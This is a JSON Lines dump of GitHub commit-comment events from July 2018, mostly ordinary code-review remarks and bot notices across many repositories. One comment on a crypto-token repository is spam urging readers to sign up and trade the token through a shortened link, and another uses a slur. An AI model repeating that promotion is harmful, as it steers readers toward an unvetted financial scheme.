{"id":"8009931304","type":"CommitCommentEvent","actor":{"login":"dinosk"},"repo":{"name":"diegodelemos/reana-job-controller"},"payload":{"comment":{"id":29813654,"position":5,"line":71,"path":"reana_job_controller/k8s.py","commit_id":"4721a1c3eecbbda67ea80b51f3f165930fafe43d","created_at":"2018-07-24T12:47:25Z","updated_at":"2018-07-24T12:47:25Z","author_association":"NONE","body":"Is the mountpath `MOUNT_DEST_PATH` for the job pods? Currently on reana-dev there is the same issue:\r\n```\r\n,\"logs\":\"bash: line 0: cd: /reana/users/00000000-0000-0000-0000-000000000000/workflows/539bf312-fad6-4d79-891f-a0b25cf88195: No such file or directory\r\n```"}},"created_at":"2018-07-24T12:47:25Z"}
{"id":"8009931386","type":"CommitCommentEvent","actor":{"login":"xdevs23"},"repo":{"name":"SimplixDot/platform_frameworks_base"},"payload":{"comment":{"id":29813655,"position":null,"line":null,"path":null,"commit_id":"e950fb45d6831b3ade3a07db6d022927a150ab9a","created_at":"2018-07-24T12:47:26Z","updated_at":"2018-07-24T12:47:26Z","author_association":"NONE","body":"Nice"}},"created_at":"2018-07-24T12:47:26Z"}
{"id":"8009931603","type":"CommitCommentEvent","actor":{"login":"kondors1995"},"repo":{"name":"nicknitewolf/kernel_xiaomi_msm8953"},"payload":{"comment":{"id":29813657,"position":null,"line":null,"path":null,"commit_id":"35d26dc8ed53ff931763ede2e7733444ec03403b","created_at":"2018-07-24T12:47:28Z","updated_at":"2018-07-24T12:47:28Z","author_association":"NONE","body":"Since this is LA.UM.6.6.2.r1-04200-89xx.0 kernel we shoud use LA.UM.6.6.2.r1-04200-89xx.0 prima instead "}},"created_at":"2018-07-24T12:47:28Z"}
{"id":"8009933214","type":"CommitCommentEvent","actor":{"login":"M0Rf30"},"repo":{"name":"M0Rf30/android-udev-rules"},"payload":{"comment":{"id":29813659,"position":null,"line":null,"path":null,"commit_id":"d19fdc3815f507e3a1a142b3423dbacdb48ca80d","created_at":"2018-07-24T12:47:44Z","updated_at":"2018-07-24T12:47:44Z","author_association":"OWNER","body":"as in #147 with the new universal rule, on top of the file, the devices should be detected with no adb_usb.ini.\r\nFor you does it work? let me know"}},"created_at":"2018-07-24T12:47:44Z"}
{"id":"8009943949","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"6568973/Intensive-RUBY"},"payload":{"comment":{"id":29813685,"position":24,"line":24,"path":"lesson1/Right_triangl.rb","commit_id":"c10bcd9b6a32456c98d3196a1fefd4ac107e3fde","created_at":"2018-07-24T12:49:40Z","updated_at":"2018-07-24T12:49:40Z","author_association":"NONE","body":"Функция max просто вывела значение из всех трех значений большее, но сторона 'c' от этого не стала самой большой. Используй вычисленное значение для занесения в переменную, а потом оперируй с ними. К примеру:\r\n```\r\nh = [a, b, c].max\r\nc1, c2 = [a, b, c].min(2)\r\n```\r\nПоследняя строка немного сложней - функция min(2) возвращает 2 меньших значения, значит это будут катеты, а затем происходит занесение значений из массива в переменные (деструктуризация), то есть\r\n`a, b = 1, 2 `\r\nприведет к тому, что a будет равно 1, а b станет равным 2 (аналогично с функцией min(2))"}},"created_at":"2018-07-24T12:49:40Z"}
{"id":"8009944610","type":"CommitCommentEvent","actor":{"login":"dimaep"},"repo":{"name":"Semihalf/marvell-dpdk"},"payload":{"comment":{"id":29813687,"position":145,"line":192,"path":"drivers/net/lport/rte_eth_lport_pmd.c","commit_id":"e1b1140cc264e81890e1340ad8940fb11b847f8c","created_at":"2018-07-24T12:49:47Z","updated_at":"2018-07-24T12:49:47Z","author_association":"NONE","body":"if in get_stats() you only read lcore statistics and sum them, so you don't need locks."}},"created_at":"2018-07-24T12:49:47Z"}
{"id":"8009946058","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"6568973/Intensive-RUBY"},"payload":{"comment":{"id":29813690,"position":12,"line":8,"path":"lesson1/idealniy_ves.rb","commit_id":"c10bcd9b6a32456c98d3196a1fefd4ac107e3fde","created_at":"2018-07-24T12:50:02Z","updated_at":"2018-07-24T12:50:02Z","author_association":"NONE","body":"почему puts без табов?"}},"created_at":"2018-07-24T12:50:02Z"}
{"id":"8009949453","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"6568973/Intensive-RUBY"},"payload":{"comment":{"id":29813698,"position":13,"line":13,"path":"lesson1/Right_triangl.rb","commit_id":"c10bcd9b6a32456c98d3196a1fefd4ac107e3fde","created_at":"2018-07-24T12:50:37Z","updated_at":"2018-07-24T12:50:37Z","author_association":"NONE","body":"пропустила букву о в слове треугольник"}},"created_at":"2018-07-24T12:50:37Z"}
{"id":"8009949454","type":"CommitCommentEvent","actor":{"login":"ATechnoHazard"},"repo":{"name":"ATechnoHazard/fwbot"},"payload":{"comment":{"id":29813697,"position":null,"line":null,"path":null,"commit_id":"05928830f17a4dd6d313cf7634c81a68ed2d20e0","created_at":"2018-07-24T12:50:36Z","updated_at":"2018-07-24T12:50:36Z","author_association":"OWNER","body":";______; time to private dis\n\nOn Tue 24 Jul, 2018, 4:39 PM Sai Praneeth Reddy, <notifications@github.com>\nwrote:\n\n> bhery osum, bhery osum. sur, u iz bhery pru!\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ATechnoHazard/fwbot/commit/05928830f17a4dd6d313cf7634c81a68ed2d20e0#commitcomment-29812668>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AeSls8cgolcQQHlgoRmJ9bN0qd2liP8Eks5uJwBmgaJpZM4Vciax>\n> .\n>\n"}},"created_at":"2018-07-24T12:50:36Z"}
{"id":"8009951498","type":"CommitCommentEvent","actor":{"login":"the-j0k3r"},"repo":{"name":"StylishThemes/GitHub-Community-Dark"},"payload":{"comment":{"id":29813703,"position":null,"line":null,"path":null,"commit_id":"d356b181dda2aa6e4c242f92c676bbdb7ac47af0","created_at":"2018-07-24T12:51:00Z","updated_at":"2018-07-24T12:51:00Z","author_association":"COLLABORATOR","body":"Never mind I think the naswer should be yes, makes sense to keep fidelity to default. Ill push the change below shortly\r\n\r\nWith blue `#4183c4`\r\n![capture](https://user-images.githubusercontent.com/31389848/43138981-74e81b2a-8f48-11e8-819e-de3288705ccb.PNG)\r\n\r\n\r\n"}},"created_at":"2018-07-24T12:51:00Z"}
{"id":"8009951612","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"6568973/Intensive-RUBY"},"payload":{"comment":{"id":29813705,"position":6,"line":6,"path":"lesson1/Right_triangl.rb","commit_id":"c10bcd9b6a32456c98d3196a1fefd4ac107e3fde","created_at":"2018-07-24T12:51:01Z","updated_at":"2018-07-24T12:51:01Z","author_association":"NONE","body":"что с табами? откуда такое видение выравнивания? 😄 "}},"created_at":"2018-07-24T12:51:01Z"}
{"id":"8009953273","type":"CommitCommentEvent","actor":{"login":"sadfool1"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29813709,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T12:51:18Z","updated_at":"2018-07-24T12:51:18Z","author_association":"NONE","body":"Great news! iRIDE.io will be listed in COINEX in 2months, SIGN UP AND TRADE\nON COINEX NOW! https://goo.gl/Swq1PT\n\n\n\nOn Tue, 24 Jul 2018, 20:26 Rolland01, <notifications@github.com> wrote:\n\n> Very good\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/iride2020/iRide-Token/commit/8f810b3700a24de0ee4f945ef84be7b2f1605610#commitcomment-29813440>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AftJ1MMdFMDhxiFJFW8peO50rGGUpAJ0ks5uJxJ6gaJpZM4VaEAl>\n> .\n>\n"}},"created_at":"2018-07-24T12:51:18Z"}
{"id":"8009965551","type":"CommitCommentEvent","actor":{"login":"leostrakosch"},"repo":{"name":"sosy-lab/java-common-lib"},"payload":{"comment":{"id":29813762,"position":null,"line":null,"path":null,"commit_id":"859dc016d24ce92dc98d48ae118662d757cf6bf6","created_at":"2018-07-24T12:53:29Z","updated_at":"2018-07-24T12:53:29Z","author_association":"CONTRIBUTOR","body":"Hm ok, now that I know where to look for build dependencies it will be fine to update these manually in the future if dependencies change."}},"created_at":"2018-07-24T12:53:29Z"}
{"id":"8009965677","type":"CommitCommentEvent","actor":{"login":"ATechnoHazard"},"repo":{"name":"SimplixDot/platform_frameworks_base"},"payload":{"comment":{"id":29813763,"position":null,"line":null,"path":null,"commit_id":"e950fb45d6831b3ade3a07db6d022927a150ab9a","created_at":"2018-07-24T12:53:30Z","updated_at":"2018-07-24T12:53:30Z","author_association":"NONE","body":"Pro af"}},"created_at":"2018-07-24T12:53:30Z"}
{"id":"8009965795","type":"CommitCommentEvent","actor":{"login":"iraplyus"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29813764,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T12:53:31Z","updated_at":"2018-07-24T12:53:31Z","author_association":"NONE","body":"Всем удачи в \r\nэтом супер проекте"}},"created_at":"2018-07-24T12:53:31Z"}
{"id":"8009968557","type":"CommitCommentEvent","actor":{"login":"ikapelyukhin"},"repo":{"name":"SUSE/doc-sle"},"payload":{"comment":{"id":29813771,"position":17,"line":61,"path":"xml/rmt_mirroring.xml","commit_id":"c0a7f13b09bf57c68d8f38dc6199217d5fd8a280","created_at":"2018-07-24T12:54:02Z","updated_at":"2018-07-24T12:54:02Z","author_association":"MEMBER","body":"There's a new `Proxies` tab now, which has the details about SMT/RMT/SUMA instances -- the credentials are also there I think at some point the credentials will be removed from `Organization` tab."}},"created_at":"2018-07-24T12:54:02Z"}
{"id":"8009970122","type":"CommitCommentEvent","actor":{"login":"xdevs23"},"repo":{"name":"SimplixDot/platform_frameworks_base"},"payload":{"comment":{"id":29813775,"position":null,"line":null,"path":null,"commit_id":"e950fb45d6831b3ade3a07db6d022927a150ab9a","created_at":"2018-07-24T12:54:20Z","updated_at":"2018-07-24T12:54:20Z","author_association":"NONE","body":"I am on GitHub retards now lol"}},"created_at":"2018-07-24T12:54:20Z"}
{"id":"8009975734","type":"CommitCommentEvent","actor":{"login":"sum1201"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":29813794,"position":null,"line":null,"path":null,"commit_id":"56a25e5f0c2fa83cc622e0ed010ea24a62fbc8d9","created_at":"2018-07-24T12:55:21Z","updated_at":"2018-07-24T12:55:21Z","author_association":"CONTRIBUTOR","body":"@mart-e \r\nplease help me merge it to 10.0 \r\nthanks"}},"created_at":"2018-07-24T12:55:21Z"}
{"id":"8009976208","type":"CommitCommentEvent","actor":{"login":"veronika-dvorakova"},"repo":{"name":"Shoptet/microsite-styles"},"payload":{"comment":{"id":29813795,"position":47,"line":41,"path":"shoptet/_common.scss","commit_id":"c422d9faa35616b4bb34fc58f8a8219cf0a12dbb","created_at":"2018-07-24T12:55:27Z","updated_at":"2018-07-24T12:55:27Z","author_association":"COLLABORATOR","body":"Nemá tady být h4?"}},"created_at":"2018-07-24T12:55:27Z"}
{"id":"8009982191","type":"CommitCommentEvent","actor":{"login":"the-j0k3r"},"repo":{"name":"StylishThemes/GitHub-Community-Dark"},"payload":{"comment":{"id":29813803,"position":null,"line":null,"path":null,"commit_id":"65e607fbd42e66a68a62e501df73f3159e473806","created_at":"2018-07-24T12:56:32Z","updated_at":"2018-07-24T12:56:32Z","author_association":"COLLABORATOR","body":"Essentially this\r\n![titlesandsmalltext](https://user-images.githubusercontent.com/31389848/43139330-5d062172-8f49-11e8-9acc-0a3b58b4f342.gif)\r\n\r\n"}},"created_at":"2018-07-24T12:56:32Z"}
{"id":"8009982348","type":"CommitCommentEvent","actor":{"login":"VencaV"},"repo":{"name":"Shoptet/microsite-styles"},"payload":{"comment":{"id":29813804,"position":47,"line":41,"path":"shoptet/_common.scss","commit_id":"c422d9faa35616b4bb34fc58f8a8219cf0a12dbb","created_at":"2018-07-24T12:56:34Z","updated_at":"2018-07-24T12:56:34Z","author_association":"COLLABORATOR","body":"Samozřejmě má, můžeš příležitostně opravit, díky."}},"created_at":"2018-07-24T12:56:34Z"}
{"id":"8009985319","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"NikitaSharipov/lesson3"},"payload":{"comment":{"id":29813817,"position":19,"line":5,"path":"railway_stations.rb","commit_id":"308c522666950b9ae5d4e2461083325065f1c8fb","created_at":"2018-07-24T12:57:06Z","updated_at":"2018-07-24T12:57:06Z","author_association":"NONE","body":"Проблема с табами, почему такое разное выравнивание?"}},"created_at":"2018-07-24T12:57:06Z"}
{"id":"8009988173","type":"CommitCommentEvent","actor":{"login":"alexey-lysiuk"},"repo":{"name":"OrdinaryMagician/gzdoom"},"payload":{"comment":{"id":29813832,"position":null,"line":null,"path":null,"commit_id":"f287e99f968c740819b6d61000865589fbbe387c","created_at":"2018-07-24T12:57:36Z","updated_at":"2018-07-24T12:57:36Z","author_association":"NONE","body":"Yes, it's not a big deal as it will be a `const` function that doesn't change object's state."}},"created_at":"2018-07-24T12:57:36Z"}
{"id":"8009989517","type":"CommitCommentEvent","actor":{"login":"SOF3"},"repo":{"name":"shabzz102/Restart"},"payload":{"comment":{"id":29813834,"position":null,"line":null,"path":null,"commit_id":"6a2cd743848131c379da616f5c59d2af7369b146","created_at":"2018-07-24T12:57:51Z","updated_at":"2018-07-24T12:57:51Z","author_association":"NONE","body":"Dear @shabzz102:\nI regret to inform you that the release you submitted, named \"**Restart**\" (v2.0.0), for the project [Restart](https://poggit.pmmp.io/ci/shabzz102/Restart/Restart) on 2018-07-24T12:41:44.000Z, has been rejected.\n\n1. Abuse of ANSI codes or multilines in startup is disallowed.\n2. Default config cannot be saved.\n3. This plugin does not restart the server. It simply stops the server. You have to clarify this in the description.\n4. This plugin can be completely replaced by [TimeCommander](https://poggit.pmmp.io/p/TimeCommander).\n\n> Note: This comment is created here because this is the last commit when the released build was created.\n\n> via Poggit (@poggit-bot)"}},"created_at":"2018-07-24T12:57:51Z"}
{"id":"8009990922","type":"CommitCommentEvent","actor":{"login":"rzr"},"repo":{"name":"fiskeben/bmp085"},"payload":{"comment":{"id":29813839,"position":null,"line":null,"path":null,"commit_id":"a964efa2a993d04e2a1b19e82288de094bde68a8","created_at":"2018-07-24T12:58:07Z","updated_at":"2018-07-24T12:58:07Z","author_association":"CONTRIBUTOR","body":"You could eventually publish into a \"org\" namespace to preserve legacy API.\r\n"}},"created_at":"2018-07-24T12:58:07Z"}
{"id":"8009993331","type":"CommitCommentEvent","actor":{"login":"cschra"},"repo":{"name":"nmsprime/nmsprime"},"payload":{"comment":{"id":29813841,"position":null,"line":null,"path":null,"commit_id":"53f1c70d3aec79b4c82cb97ce47a401be901df1e","created_at":"2018-07-24T12:58:30Z","updated_at":"2018-07-24T12:58:30Z","author_association":"COLLABORATOR","body":"not 100 % sure about this one, due to rebasing this could have been reintroduced....\r\nI will do an interactive rebase on friday, where I can remove this one"}},"created_at":"2018-07-24T12:58:30Z"}
{"id":"8010000027","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"NikitaSharipov/lesson3"},"payload":{"comment":{"id":29813857,"position":34,"line":17,"path":"railway_stations.rb","commit_id":"308c522666950b9ae5d4e2461083325065f1c8fb","created_at":"2018-07-24T12:59:42Z","updated_at":"2018-07-24T12:59:42Z","author_association":"NONE","body":"В этом методе у тебя и вывод значений (puts) и возврат самого списка станций. \r\nКак правило в классах моделей не реализуется вывод информации, это уже забота вызывающего кода. Достаточно вернуть просто список, а вывести уже там где это потребуется (в интерфейсе)"}},"created_at":"2018-07-24T12:59:42Z"}
{"id":"8010001308","type":"CommitCommentEvent","actor":{"login":"Puspalata"},"repo":{"name":"Puspalata/like-dislike-counter-for-posts-pages-and-comments"},"payload":{"comment":{"id":29813859,"position":null,"line":null,"path":null,"commit_id":"a29681193e031d687a4759958245fe88c9fc3719","created_at":"2018-07-24T12:59:55Z","updated_at":"2018-07-24T12:59:55Z","author_association":"OWNER","body":"I am using this plugin. I want to display order by like counter. If the post having more like than others then that post will be display First. So can you please suggest which meta have to write in my code --\r\n$args_lip = array( 'posts_per_page' =>-1, 'order'=> 'DESC', 'orderby' => 'date', 'category' => '2' );\r\n"}},"created_at":"2018-07-24T12:59:55Z"}
{"id":"8010005000","type":"CommitCommentEvent","actor":{"login":"bumi"},"repo":{"name":"railslove/cmxl"},"payload":{"comment":{"id":29813868,"position":null,"line":null,"path":null,"commit_id":"44e80f4a2463ea228bb463493df45400ec77b071","created_at":"2018-07-24T13:00:30Z","updated_at":"2018-07-24T13:00:30Z","author_association":"MEMBER","body":":tada: :shipit: \r\nschnaps-release!"}},"created_at":"2018-07-24T13:00:30Z"}
{"id":"8010008025","type":"CommitCommentEvent","actor":{"login":"semihalf-ostruszka-andrzej"},"repo":{"name":"Semihalf/marvell-dpdk"},"payload":{"comment":{"id":29813875,"position":386,"line":510,"path":"drivers/net/lport/rte_eth_lport_pmd.c","commit_id":"e1b1140cc264e81890e1340ad8940fb11b847f8c","created_at":"2018-07-24T13:01:01Z","updated_at":"2018-07-24T13:01:01Z","author_association":"NONE","body":"Nobody at the moment.  They will be there waiting for the next tx - that is how it was designed from the very beginning.\r\n\r\nNote however that this situation is not very likely.  We are putting to the ring only when using shared tx queue and other core is keeping the lock.  When other core is keeping the lock most of the time it will be spent in drain_tx_ring which is looping until the ring is empty and the ring is multi producer friendly so it should send the packets from other cores too.  However when it has cleared the ring and transmits its own packets the other core has a chance to queue its packets which will sit until next call.\r\n\r\nThe options that I can think of to handle this are:\r\n- do not queue to TX ring at all but wait for the lock (performance drop - tested this in the very beginning)\r\n- add some timer mechanism (that would be fun to test - but my guess is that will slow \"sunny day scenario\" a bit)"}},"created_at":"2018-07-24T13:01:01Z"}
{"id":"8010010579","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"NikitaSharipov/lesson3"},"payload":{"comment":{"id":29813882,"position":99,"line":68,"path":"railway_stations.rb","commit_id":"308c522666950b9ae5d4e2461083325065f1c8fb","created_at":"2018-07-24T13:01:27Z","updated_at":"2018-07-24T13:01:27Z","author_association":"NONE","body":"пробелы вокруг операторов +/-\r\nОпять же, вывод таких данных - забота интерфейса"}},"created_at":"2018-07-24T13:01:27Z"}
{"id":"8010011058","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"NikitaSharipov/lesson3"},"payload":{"comment":{"id":29813883,"position":110,"line":78,"path":"railway_stations.rb","commit_id":"308c522666950b9ae5d4e2461083325065f1c8fb","created_at":"2018-07-24T13:01:32Z","updated_at":"2018-07-24T13:01:32Z","author_association":"NONE","body":"таб"}},"created_at":"2018-07-24T13:01:32Z"}
{"id":"8010011846","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"NikitaSharipov/lesson3"},"payload":{"comment":{"id":29813884,"position":107,"line":76,"path":"railway_stations.rb","commit_id":"308c522666950b9ae5d4e2461083325065f1c8fb","created_at":"2018-07-24T13:01:40Z","updated_at":"2018-07-24T13:01:40Z","author_association":"NONE","body":"лишний пробел перед скобкой"}},"created_at":"2018-07-24T13:01:40Z"}
{"id":"8010013189","type":"CommitCommentEvent","actor":{"login":"cilekli-link"},"repo":{"name":"cilekli-link/suro2"},"payload":{"comment":{"id":29813887,"position":null,"line":null,"path":null,"commit_id":"07565590780170201a74c5ba2178c586b69a7b5b","created_at":"2018-07-24T13:01:54Z","updated_at":"2018-07-24T13:01:54Z","author_association":"OWNER","body":"This is a comment"}},"created_at":"2018-07-24T13:01:54Z"}
{"id":"8010020658","type":"CommitCommentEvent","actor":{"login":"vincentfretin"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29813902,"position":4,"line":37,"path":"assembl/views/__init__.py","commit_id":"f5bdfddf1cd0d8f27506b72acca3671fdaa7cf13","created_at":"2018-07-24T13:03:14Z","updated_at":"2018-07-24T13:03:14Z","author_association":"CONTRIBUTOR","body":"Did you want to commit that?"}},"created_at":"2018-07-24T13:03:14Z"}
{"id":"8010021781","type":"CommitCommentEvent","actor":{"login":"Lindz1"},"repo":{"name":"alonzi/alderman"},"payload":{"comment":{"id":29813907,"position":3,"line":14,"path":"phase2-picklistmodels/liaison_review/Data_Dictionary.md","commit_id":"c1d4e7f00b64a0454e7e3393105b508a241f5465","created_at":"2018-07-24T13:03:25Z","updated_at":"2018-07-24T13:03:25Z","author_association":"COLLABORATOR","body":"Text in data within 596 tag number.  All the libraries that have items attached to that Control #(record)"}},"created_at":"2018-07-24T13:03:25Z"}
{"id":"8010024488","type":"CommitCommentEvent","actor":{"login":"dimaep"},"repo":{"name":"Semihalf/marvell-dpdk"},"payload":{"comment":{"id":29813912,"position":407,"line":531,"path":"drivers/net/lport/rte_eth_lport_pmd.c","commit_id":"e1b1140cc264e81890e1340ad8940fb11b847f8c","created_at":"2018-07-24T13:03:55Z","updated_at":"2018-07-24T13:03:55Z","author_association":"NONE","body":"I think you don't need atomic counters per lcore. You need only 64 bits size.\r\nget_stats will read counters from all lcores and sum them. You don't need atomic for read.\r\nYou need do something special only for reset.\r\nFor example on reset_stats read counters from each lcore and save them as base.\r\non get_stats read counters from lcores and do \r\nrx_pkts = 0\r\nfor each lcore\r\n    rx_pkts += lcore.rx_pkts - lcore.base"}},"created_at":"2018-07-24T13:03:55Z"}
{"id":"8010028087","type":"CommitCommentEvent","actor":{"login":"grokcoder"},"repo":{"name":"hyperchain/cache"},"payload":{"comment":{"id":29813918,"position":1,"line":1,"path":".idea/vcs.xml","commit_id":"b9241b6646cf0e6c45094563e6de8a8333b28d93","created_at":"2018-07-24T13:04:34Z","updated_at":"2018-07-24T13:04:34Z","author_association":"NONE","body":"remove .idea ?"}},"created_at":"2018-07-24T13:04:34Z"}
{"id":"8010028640","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/libsecret-feedstock"},"payload":{"comment":{"id":29813919,"position":null,"line":null,"path":null,"commit_id":"bd332ae4a79723d8fc492b7f7c679d0a39cc0a1f","created_at":"2018-07-24T13:04:40Z","updated_at":"2018-07-24T13:04:40Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @nehaljwani was added to this feedstock maintenance team.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-24T13:04:40Z"}
{"id":"8010032511","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29813926,"position":null,"line":null,"path":null,"commit_id":"ce6ccf1e29f0ce896512a5cf4056fe06f6345589","created_at":"2018-07-24T13:05:20Z","updated_at":"2018-07-24T13:05:20Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-24T13:05:20Z"}
{"id":"8010033902","type":"CommitCommentEvent","actor":{"login":"youhour"},"repo":{"name":"open-power/vpdtools"},"payload":{"comment":{"id":29813932,"position":48,"line":48,"path":"examples/p9/openbmc/openPower_obmc_opfr_record.xml","commit_id":"0792c52015f3ff1c7186f0ac8b48b109c54df0a1","created_at":"2018-07-24T13:05:34Z","updated_at":"2018-07-24T13:05:34Z","author_association":"CONTRIBUTOR","body":"There is no spec for the processor FRU VPD.  This has been done fore more than a decade now and no spec was created for piece.   And also, this is not something that a developer would do.  This template is something that is used by manufacture to update processor update for the FRU VPD info.  You can find the mvpd specification in the P9 community,  https://www-355.ibm.com/systems/power/openpower/posting.xhtml?postingId=E33A297D0DB0990285258010007D2CB9&docId=E33A297D0DB0990285258010007D2CB9&fileName=P9SO_FRU-VPD_v1.4_pub.pdf"}},"created_at":"2018-07-24T13:05:34Z"}
{"id":"8010034712","type":"CommitCommentEvent","actor":{"login":"NinoRy"},"repo":{"name":"nmsprime/nmsprime"},"payload":{"comment":{"id":29813935,"position":null,"line":null,"path":null,"commit_id":"53f1c70d3aec79b4c82cb97ce47a401be901df1e","created_at":"2018-07-24T13:05:43Z","updated_at":"2018-07-24T13:05:43Z","author_association":"COLLABORATOR","body":"git revert should do this job as well ;)"}},"created_at":"2018-07-24T13:05:43Z"}
{"id":"8010035056","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/spectral-cube-feedstock"},"payload":{"comment":{"id":29813937,"position":null,"line":null,"path":null,"commit_id":"e9f226eed1364222cdbed0c7ccf7f93022a0edd7","created_at":"2018-07-24T13:05:46Z","updated_at":"2018-07-24T13:05:46Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @astrofrog-conda-forge was added to this feedstock maintenance team.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-24T13:05:46Z"}
{"id":"8010043117","type":"CommitCommentEvent","actor":{"login":"caitp"},"repo":{"name":"WebKit/webkit"},"payload":{"comment":{"id":29813949,"position":14,"line":1164,"path":"Source/JavaScriptCore/bytecode/CodeBlock.cpp","commit_id":"0e358f9e91dcc37e9e14ca1e7baeeaf12c5b66a7","created_at":"2018-07-24T13:07:08Z","updated_at":"2018-07-24T13:07:08Z","author_association":"NONE","body":"Ok, so we basically always need to visit the new structure. at this point, otherwise it's likely the \"old structure\" won't be retained, because it's used for such a narrow slice of time. This is the reason flakiness was introduced in this commit (rather than consistently failing, due to never being marked/retained).\r\n\r\nI'm not sure if the \"always hang onto these transitions\" strategy is going to fly with reviewers, that's potentially expensive. It would be good if we could ultimately keep the just final shape instead. Is this possible?"}},"created_at":"2018-07-24T13:07:08Z"}
{"id":"8010043550","type":"CommitCommentEvent","actor":{"login":"vincentfretin"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29813950,"position":5,"line":114,"path":"assembl/static2/js/app/components/login/signupForm.jsx","commit_id":"750549a0cee984ec3ebe9976e246e5a8ef53d5d5","created_at":"2018-07-24T13:07:12Z","updated_at":"2018-07-24T13:07:12Z","author_association":"CONTRIBUTOR","body":"If you have the hidden feature for SelectField as well, you need to add the check for SelectField below too."}},"created_at":"2018-07-24T13:07:12Z"}
{"id":"8010049196","type":"CommitCommentEvent","actor":{"login":"kristalls"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29813952,"position":2,"line":2,"path":"lesson2/fibonacci.rb","commit_id":"92d91dc53c0cb342d4d32e22099cc19a4804ec0e","created_at":"2018-07-24T13:08:11Z","updated_at":"2018-07-24T13:08:11Z","author_association":"OWNER","body":"Не понял как это сделать."}},"created_at":"2018-07-24T13:08:11Z"}
{"id":"8010051554","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29813955,"position":null,"line":null,"path":null,"commit_id":"69a76c40e2086f537776783a5aa03c1cb8b6ac7d","created_at":"2018-07-24T13:08:35Z","updated_at":"2018-07-24T13:08:35Z","author_association":"COLLABORATOR","body":"Puzzle `1035-a9c9989f` disappeared from [`src/main/java/com/zerocracy/pmo/Options.java`](https://github.com/zerocracy/farm/blob/master/src/main/java/com/zerocracy/pmo/Options.java), that's why I closed #1186. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-24T13:08:35Z"}
{"id":"8010053013","type":"CommitCommentEvent","actor":{"login":"bra1nwave"},"repo":{"name":"void-linux/void-packages"},"payload":{"comment":{"id":29813957,"position":null,"line":null,"path":null,"commit_id":"f5d879003afefc786c3b5bffca317d6093f5d9cb","created_at":"2018-07-24T13:08:50Z","updated_at":"2018-07-24T13:08:50Z","author_association":"CONTRIBUTOR","body":"`inkscape` won't build, because `cairomm` and `ImageMagick` need rebuild first.\r\nSee: https://github.com/void-linux/void-packages/pull/1152"}},"created_at":"2018-07-24T13:08:50Z"}
{"id":"8010059859","type":"CommitCommentEvent","actor":{"login":"elfring"},"repo":{"name":"fangfufu/httpdirfs"},"payload":{"comment":{"id":29813965,"position":4,"line":14,"path":"main.c","commit_id":"bfceba8e1bd58ee134b6deb63a1fa24cc63b62cc","created_at":"2018-07-24T13:10:04Z","updated_at":"2018-07-24T13:10:04Z","author_association":"NONE","body":"I prefer to avoid unnecessary source code duplication."}},"created_at":"2018-07-24T13:10:04Z"}
